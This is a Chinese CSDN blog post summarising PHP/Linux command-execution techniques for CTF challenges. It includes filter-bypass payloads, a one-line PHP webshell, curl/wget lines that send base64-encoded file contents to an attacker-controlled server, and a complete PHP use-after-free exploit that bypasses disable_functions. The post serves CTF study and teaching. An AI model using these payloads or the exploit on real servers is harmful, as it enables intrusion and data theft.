RCE(命令执行)总结

已于 2023-05-28 23:22:24 修改
阅读量2.3k 收藏 30
点赞数 2
分类专栏: CTF 文章标签: linux web安全 php
于 2023-01-05 13:31:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61839115/article/details/128561895
版权

文章目录

RCE(命令、代码执行)总结

1、过滤cat、flag等关键字

1.1 常见linux系统命令
more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示,可以看出 taccat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容
strings
rev
1.2 使用转义符
ca\t fl\ag ;
1.3 使用引号
ca''t  fl''ag;
1.4 内联执行绕过

拼接 flag

?code=a=ag;b=fl;cat $b$a;   //相当于 cat flag

第二种:

//当前目录下有 index.php、flag.php
cat `ls`;
//相当于 cat index.php;cat flag.php, 将ls命令的结果给cat去执行
1.5 编码绕过

base64编码

[root~]# echo 'cat flag.txt' | base64
Y2F0IGZsYWcudHh0Cg==
[root~]# echo Y2F0IGZsYWcudHh0Cg== | base64 -d
cat flag.txt
    
[root~]# echo Y2F0IGZsYWcudHh0Cg== | base64 -d | sh
flag{flag_is_here}
[root~]# echo Y2F0IGZsYWcudHh0Cg== | base64 -d | bash
flag{flag_is_here}
1.6 进制绕过

16进制

[root~]# echo cat flag.txt | xxd 
6361 7420 666c 6167 2e74 7874 0a
[root~]# echo 6361 7420 666c 6167 2e74 7874 0a | xxd -r -p
cat flag.txt
[root~]# echo 6361 7420 666c 6167 2e74 7874 0a | xxd -r -p | bash  或 | sh
flag{flag_is_here}


[root~]# $(printf "\x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x74\x78\x74")  //cat flag.txt 16进制
flag{flag_is_here}

8进制

[root~]# $(printf "\143\141\164\40\146\154\141\147\56\164\170\164")  
flag{flag_is_here}
1.7 过滤文件名(如: /etc/passwd文件)
1) 利用正则匹配绕过

[root~]# cat /???/pass*

2) 例如过滤/etc/passwd中的etc,利用未初始化变量,使用$u绕过

[root~]# cat /etc$u/passwd
1.8 使用$*$@$x,${x}

在这里插入图片描述

1.9 读取文件命令
curl file:///root/Desktop/flag.txt
strings flag.txt
uniq -c/etc/passwd
bash -v /etc/passwd
rev /etc/passwd
sort flag.txt
image-20221227000353472
1.10 查找文件命令(find)
# find . -name f*   //查找当前目录下f开头的文件
./flag.txt

2、rce常见php函数

system()  执行命令
passthru()
exec()
shell_exec()
popen()
pcntl_exec()
反引号  同shell_exec()
eval()  执行命令
show_source() 高亮显示文件
highlight_file()  高亮显示文件
array_reverse()  反向输出元素
pos()  输出当前元素的值
localeconv()  返回一包含本地数字及货币格式信息的数组
include  一般用于括号被过滤的情况,因为可以不用括号
require  一般用于括号被过滤的情况,因为可以不用括号
echo()  输出
next()  下一个元素

3、rce常见linux系统命令

more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容
strings
rev	反过来输出文件内容

4、过滤空格

  • %09(url传递)(cat%09flag.php)
  • ${IFS}
  • $IFS$9
  • <>(cat<>/flag
  • <(cat</flag) 输入重定向
  • {cat,flag}

在Linux bash中还可以使用{OS_COMMAND,ARGUMENT}来执行系统命令

eg.
{ls,}
{cat,flags}
{mv,flags,flag}

5、过滤目录分隔符 /

<?php

$res = FALSE;

if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/\//", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

采用多个命令即可

/?ip=;cd flag_is_here;cat f*;

6、过滤分隔符 ;

1,可以使用%0a代替,%0a其实在某种程度上是最标准的命令链接符号

功能 符号 payload
换行符 %0a ?cmd=123%0als
回车符 %0d ?cmd=123%0dls
连续指令 ; ?1=123;pwd
后台进程 & ?1=123&pwd
管道 | ?1=123|pwd
逻辑运算 ||或&& ?1=123&&pwd

;	//分号
|	//把前面输出的当作后面的输入 (管道符)
||	//前面为假才执行后面的指令
&	//两条命令都会执行
&&	//前面为假,后面不执行

2,?>代替;

在php中可以用?>来代替最后一个;因为php遇到定界符关闭标志时,系统会自动在PHP语句之后加上一个分号。
例题:ctfshow-web入门36

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}

这道题过滤了分号,直接用?>来代替分号

include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

7、shell_exec等无回显函数

复制,压缩,写shell等方法

copy flag.php 1.txt		//复制
mv flag.php flag.txt	//改名
cat flag.php > flag.txt
tar cvf flag.tar flag.php	//压缩
tar zcvf flag.tar.gz flag.php
echo 3c3f706870206576616c28245f504f53545b3132335d293b203f3e|xxd -r -ps > webshell.php 
echo "<?php @eval(\$_POST[123]); ?>" > webshell.php	//写入webshell

在vps上建立记录脚本

在自己的公网服务器站点根目录写入php文件,内容如下:
record.php

<?php
$data =$_GET['data'];
$f = fopen("flag.txt", "w");
fwrite($f,$data);
fclose($f);
?>

在目标服务器的测试点可以发送下面其中任意一条请求进行测试

curl http://*.*.*.**/record.php?data=`cat flag.php|base64`
wget http://*.*.*.*/record.php?data=`cat flag.php|base64`
>/dev/null 2>&1类无回显

ctfshow-web入门42-wp

8、无数字字母getshell

异或、取反、自增、或、上传临时文件

9、过滤括号

使用不需要括号的函数

echo `cat /flag`

  • require、include

    require '/flag'
include%09$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

可以取反两次

<?=require~~flag.txt?>
<?=require~%d0%99%93%9e%98?>

10、无参数RCE

get_defined_vars()

返回由所有已定义变量所组成的数组

session_id()

可以获取PHPSESSID的值

无参数RCE

在这里插入图片描述

读取目录:

print_r(scandir(current(localeconv())));
print_r(scandir(pos(localeconv())));
print_r(scandir(dirname(__FILE__)));

11、内联执行

echo `ls`;
echo $(ls);
?><?=`ls`;
?><?=$(ls);

在这里插入图片描述

将``或$()内命令的输出作为输入执行

12、open_basedir绕过

glob伪协议:

<?php
// 循环 ext/spl/examples/ 目录里所有 *.php 文件
// 并打印文件名和文件尺寸
$it = new DirectoryIterator("glob://ext/spl/examples/*.php");
foreach($it as $f) {
    printf("%s: %.1FK\n", $f->getFilename(), $f->getSize()/1024);
}
?>

symlink()函数

13、disable_function绕过

14、通配符+绝对路径调用命令

在这里插入图片描述

一些常用工具所在目录:

/bin/cat
/bin/base64 flag.php    //base64编码flag.php的内容。
/usr/bin/bzip2 flag.php //将flag.php文件进行压缩,然后再将其下载。
    
/???/????64 ????.???  #/bin/base64 flag.php
/???/???/????2 ????.??? #/usr/bin/bzip2 flag.php

例题:ctfshow-web入门55

15、使用~$()构造数字

ctfshow-web入门57

$(())=0
$((~$(())))=-1

在这里插入图片描述

16、 uaf脚本绕过disable_function

例题:ctfshow-web入门72

脚本如下:

c=function ctfshow($cmd) {
    global $abc, $helper, $backtrace;

    class Vuln {
        public $a;
        public function __destruct() { 
            global $backtrace; 
            unset($this->a);
            $backtrace = (new Exception)->getTrace();
            if(!isset($backtrace[1]['args'])) {
                $backtrace = debug_backtrace();
            }
        }
    }

    class Helper {
        public $a, $b, $c, $d;
    }

    function str2ptr(&$str, $p = 0, $s = 8) {
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }

    function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= sprintf("%c",($ptr & 0xff));
            $ptr >>= 8;
        }
        return $out;
    }

    function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for($i = 0; $i < $n; $i++) {
            $str[$p + $i] = sprintf("%c",($v & 0xff));
            $v >>= 8;
        }
    }

    function leak($addr, $p = 0, $s = 8) {
        global $abc, $helper;
        write($abc, 0x68, $addr + $p - 0x10);
        $leak = strlen($helper->a);
        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }

    function parse_elf($base) {
        $e_type = leak($base, 0x10, 2);

        $e_phoff = leak($base, 0x20);
        $e_phentsize = leak($base, 0x36, 2);
        $e_phnum = leak($base, 0x38, 2);

        for($i = 0; $i < $e_phnum; $i++) {
            $header = $base + $e_phoff + $i * $e_phentsize;
            $p_type  = leak($header, 0, 4);
            $p_flags = leak($header, 4, 4);
            $p_vaddr = leak($header, 0x10);
            $p_memsz = leak($header, 0x28);

            if($p_type == 1 && $p_flags == 6) { 

                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                $data_size = $p_memsz;
            } else if($p_type == 1 && $p_flags == 5) { 
                $text_size = $p_memsz;
            }
        }

        if(!$data_addr || !$text_size || !$data_size)
            return false;

        return [$data_addr, $text_size, $data_size];
    }

    function get_basic_funcs($base, $elf) {
        list($data_addr, $text_size, $data_size) = $elf;
        for($i = 0; $i < $data_size / 8; $i++) {
            $leak = leak($data_addr, $i * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                
                if($deref != 0x746e6174736e6f63)
                    continue;
            } else continue;

            $leak = leak($data_addr, ($i + 4) * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                
                if($deref != 0x786568326e6962)
                    continue;
            } else continue;

            return $data_addr + $i * 8;
        }
    }

    function get_binary_base($binary_leak) {
        $base = 0;
        $start = $binary_leak & 0xfffffffffffff000;
        for($i = 0; $i < 0x1000; $i++) {
            $addr = $start - 0x1000 * $i;
            $leak = leak($addr, 0, 7);
            if($leak == 0x10102464c457f) {
                return $addr;
            }
        }
    }

    function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = leak($addr);
            $f_name = leak($f_entry, 0, 6);

            if($f_name == 0x6d6574737973) {
                return leak($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry != 0);
        return false;
    }

    function trigger_uaf($arg) {

        $arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
        $vuln = new Vuln();
        $vuln->a = $arg;
    }

    if(stristr(PHP_OS, 'WIN')) {
        die('This PoC is for *nix systems only.');
    }

    $n_alloc = 10; 
    $contiguous = [];
    for($i = 0; $i < $n_alloc; $i++)
        $contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');

    trigger_uaf('x');
    $abc = $backtrace[1]['args'][0];

    $helper = new Helper;
    $helper->b = function ($x) { };

    if(strlen($abc) == 79 || strlen($abc) == 0) {
        die("UAF failed");
    }

    $closure_handlers = str2ptr($abc, 0);
    $php_heap = str2ptr($abc, 0x58);
    $abc_addr = $php_heap - 0xc8;

    write($abc, 0x60, 2);
    write($abc, 0x70, 6);

    write($abc, 0x10, $abc_addr + 0x60);
    write($abc, 0x18, 0xa);

    $closure_obj = str2ptr($abc, 0x20);

    $binary_leak = leak($closure_handlers, 8);
    if(!($base = get_binary_base($binary_leak))) {
        die("Couldn't determine binary base address");
    }

    if(!($elf = parse_elf($base))) {
        die("Couldn't parse ELF header");
    }

    if(!($basic_funcs = get_basic_funcs($base, $elf))) {
        die("Couldn't get basic_functions address");
    }

    if(!($zif_system = get_system($basic_funcs))) {
        die("Couldn't get zif_system address");
    }


    $fake_obj_offset = 0xd0;
    for($i = 0; $i < 0x110; $i += 8) {
        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
    }

    write($abc, 0x20, $abc_addr + $fake_obj_offset);
    write($abc, 0xd0 + 0x38, 1, 4); 
    write($abc, 0xd0 + 0x68, $zif_system); 

    ($helper->b)($cmd);
    exit();
}

ctfshow("cat /flag0.txt");ob_end_flush();
#需要通过url编码哦

17、反弹shell

参考文章

rce总结

Tr4n
关注
  • 2
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
pikachu靶场 :五、RCE
qq_43233085的博客
01-31 1107
pikachu靶场 :五、RCE 概述远程系统命令执行远程代码执行exec "ping"exec "eval" 概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操...
Thinkphp5 RCE总结 _ ChaBug安全1
08-03
【ThinkPHP5 RCE漏洞总结】 ThinkPHP5 Remote Code Execution(RCE)漏洞是指攻击者可以利用该框架的某些功能执行远程代码,从而对系统造成严重影响的安全问题。这些漏洞主要出现在ThinkPHP 5.0和5.1两个大版本中,...
rce命令执行
WEB渗透测试 从入门到萌新
04-07 1599
概述 RCE(remote command/code execute)漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而,如果,设计者在完成该功能时,没有做严格的安全
RCE:代码执行命令执行
qq_68163788的博客
05-30 1196
RCE是一种严重的安全漏洞,允许攻击者通过远程方式执行恶意代码或命令在受感染的系统上。这种漏洞可以被利用来获取系统权限、窃取敏感数据、篡改网站内容或者在受感染系统上植入后门,从而使攻击者能够完全控制受感染系统。RCE的危害性极高,因为攻击者可以利用这种漏洞对系统进行广泛的破坏,甚至扩大攻击范围至整个网络。 RCE漏洞通常存在于网络应用程序、操作系统或者其他软件中,攻击者可以通过各种方式发现和利用这些漏洞。
RCE代码命令执行
m0_48907714的博客
04-15 4189
RCE 分类 代码执行执行脚本代码) 命令执行执行系统命令) 插一句不相关的 所有漏洞形成的条件 可控变量,漏洞函数 poc是用来检测有没有漏洞的 exp是用来利用漏洞的 代码执行 举例 <?php $code = $_GET['x']; eval($code);//该函数就是将括号内容当作php语句执行 ?> 结果 检测 白盒 代码审计 黑盒 漏扫工具 公开漏洞 手工看参数 命令执行 举例 <?php $code=$_GET['x'];
RCE——命令执行
m0_73756016的博客
02-21 897
和星号(*)用来模糊搜索文件?将前面的命令的输出作为后面命令的输入,把前面命令的结果当成后面命令的参数,前面的命令和后面的命令都会执行,但只显示后面的命令执行结果。shell_exec(): 执行shell命令并返回输出的结果的字符串,回显需要echo。若前面的命令执行成功,则后面的命令就不会执行,若前面的命令执行失败,则执行后面的命令。"<"表示的是输入重定向的意思,就是把<后面跟的文件取代键盘作为新的输入设备。exec(): 执行一个外部的应用程序,以数组形式保存结果,回显需要echo。
RCE-命令执行总结
m0_62008601的博客
11-23 947
命令执行总结,更新ing~~
WEB安全知识总结.zip
12-27
6. **远程命令执行RCE)**:如果Web应用允许不受限制的代码执行,攻击者可能利用此漏洞执行任意系统命令。加固代码审查、限制函数调用和禁用不必要的系统服务可以减少风险。 7. **XML外部实体(XXE)漏洞**:在...
fastjson1.2.24反序列化RCE
最新发布
06-24
**Fastjson 1.2.24 反序列化...总结来说,Fastjson 1.2.24反序列化RCE漏洞是由于库的反序列化机制中存在的缺陷,攻击者可以通过构造恶意JSON数据来执行任意代码。理解和防范这类漏洞对于保障应用程序的安全至关重要。
Ruby-Blender一个模块化的远程命令执行框架
08-15
远程命令执行(Remote Command Execution, RCE)是指在不同的计算机或网络设备之间进行命令或脚本的执行。在DevOps场景下,这通常用于配置管理、系统监控、软件部署和更新等任务。Ruby-Blender通过其独特的纯Ruby ...
petulant-octo-tribble:通过HTTP的NodeJS“安全命令执行
05-20
5. 安全风险:不当的命令执行可能导致远程代码执行RCE)漏洞,攻击者可以通过构造特定的HTTP请求执行恶意命令。 6. 输入验证与权限控制:为了防止安全问题,必须对来自HTTP请求的数据进行严格验证和过滤,限制命令...
CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 复现环境
04-18
本附件是对CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 的复现环境。 将文件下载到本地,直接运行tomcat 启动服务器,地址栏输入 http://localhost:8080/cgi-bin/hello.bat?c:/windows/system32/net user 即可看到漏洞效果,请勿非法使用,仅供学习研究
网络安全深入学习第一课——热门框架漏洞(RCE-命令执行
p36273的博客
09-16 653
----- 应用有时需要调用一些执行系统命令的函数,比如php中的system、exec、shell_exec、passthru、popen等,当用户调用这些函数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。------命令执行产生原因:Web应用的脚本代码在执行命令的时候过滤不严,从而注入一段攻击者能够控制的代码,在服务器上执行恶意指令。------ 命令执行漏洞是PHP应用程序中最常见的漏洞之一。------ 命令执行漏洞:直接调用操作系统命令
RCE代码及命令执行(详解)
剁椒鱼头没剁椒的博客
12-20 4396
借鉴链接:https://www.cnblogs.com/networkroom/p/16395024.html当然还有很多的其他函数,可以自学百度搜索。在low级别中是接受了用户输入的IP,服务器通过操作性的不同情况执行ping命令,并且Low级别中并未对输入的内容进行过滤。在Medium级别中是对“&&”与“;”进行了过滤,那么这里可以不使用这两个破解符即可,使用别的,比如我之前提到的“|”或者“&”。在High级别中是对“| ”进行过滤了,这里不知道是作者无意间敲了一个空格还是故意的。
WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘
siu~
10-25 761
1、RCE-原理-代码执行&命令执行 2、RCE-黑白盒-过滤绕过&不回显方案
RCE远程命令执行学习
Goodric的博客
02-14 1761
RCE(remote command/code execute ,远程命令执行) 命令执行一般发生在远程,故被称为远程命令执行RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 应用系统从设计上需要给用户提供指定的远程命令操作的接口。( 比如常见的路由器、防火墙、入侵检测等设备的web管理界面上) 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如果设计者在此输入界面的功能
RCE命令执行)知识点总结最详细
m0_73605862的博客
02-09 1594
1.PHP常见的命令执行函数1)system()执行外部程序,并且返回命令输出的最后一行输出2)exec()执行外部程序,但是输出执行结果的最后一行内容执行外部程序,并且显示原始输出false4)eval()把字符串作为php代码执行,无回显注意,eval不能包含打开/关闭的php tags,就是不能包含完整的,但是可以用?>xxxxxx<?php这种。除此之外,传入的必须是有效的php代码,要以分号结尾。通过shell执行命令,并将完整的输出以字符串的方式返回6)执行运算符反引号在php中等同于。
RCE(代码执行/命令执行)漏洞
mr_yuyou的博客
10-13 292
RCE(远程执行/命令执行) 产生的原理: 在web应用中,为达到灵活性、简洁性,会在代码中调用代码或命令执行函数去处理,同时没有对这些函数进行过滤,导致攻击者通过这些函数进行对系统注入命令或代码 远程代码执行漏洞产生常见的函数: php命令执行函数:system()、exec()、shell_exec()、pcntl_exec()、popen()、proc_popen()、passthru() <?php $params = $_GET['x']; system($params);
RCE命令执行/代码执行总结
weixin_60719780的博客
03-12 474
exec执行command命令,但是不会输出全部结果,而是返回结果的最后一行,如果你想得到全部的结果,可以使用第二个参数,让其输出到一个数组,数组的每一个记录代表了输出的每一行,如果输出结果有10行,则数组就有10条记录。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。eval():函数把字符串按照 PHP 代码来计算,该字符串必须是合法的 PHP 代码,且必须以分号结尾。
ctfshow web入门命令执行
09-05
在CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过技巧,如分号、竖线、双与号等。这些技巧可以用来绕过应用程序对输入参数的限制,从而注入恶意的命令。 引用中提到的payload,其中使用了一个通用的命令执行函数"show_source"来显示指定文件的源代码。这个payload可以用来尝试执行"flag.php"文件的源代码。但前提是要知道有一个名为"flag.php"的文件存在。 另外,引用中提供了另一种payload的示例,其中使用了array_reverse和scandir函数来获取文件目录并显示指定文件的源代码。同样,也可以直接使用show_source('flag.php')来显示"flag.php"文件的源代码。 需要注意的是,命令执行漏洞是非常危险的,因为它可以导致恶意用户执行任意的系统命令。为了保护Web应用程序免受此类攻击,开发人员应该对用户的输入进行严格的验证和过滤,并使用安全的编程实践来防止命令注入漏洞的发生。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [ctfshow web入门之命令执行](https://blog.csdn.net/uuzfumo/article/details/128357863)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CTFShow Web入门 命令执行](https://blog.csdn.net/qq_19533763/article/details/123910732)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值